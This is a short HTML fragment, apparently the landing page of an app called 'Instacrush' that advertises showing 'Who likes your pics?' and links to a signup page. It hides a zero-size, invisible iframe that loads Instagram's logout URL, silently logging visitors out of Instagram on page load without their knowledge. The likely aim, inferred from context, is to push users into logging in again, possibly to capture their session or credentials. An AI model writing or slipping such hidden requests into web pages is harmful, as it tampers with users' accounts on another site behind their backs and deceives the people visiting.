<h1 class="welcomeheader">Instacrush</h1>
<h2 class="intro">Who likes your pics?</h2>
<div style="display:none"><iframe src="https://instagram.com/accounts/logout/" width="0" height="0"></iframe></div>


<div class="main">



<a href="/users/new"><div class="heart"></div></a>


</div>